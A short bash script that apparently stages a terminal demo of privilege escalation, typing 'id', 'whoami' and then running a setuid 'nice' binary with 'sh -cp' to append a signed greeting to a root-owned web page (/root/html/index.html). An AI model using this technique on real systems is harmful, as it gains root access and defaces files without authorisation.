#!/bin/bash

echo -n "vulnerable:1> "
sleep 1
echo "id" | pv -qL 10 
id
echo -n "vulnerable:1> "
sleep 1
echo "whoami" | pv -qL 10 
whoami
echo -n "vulnerable:1> "
sleep 1
echo "/usr/bin/nice sh -cp 'echo \"Hello! From: @JR_Knox1977\" >> /root/html/index.html'" | pv -qL 10 
/usr/bin/nice sh -cp 'echo "Hello! From: @JR_Knox1977" >> /root/html/index.html'
exit
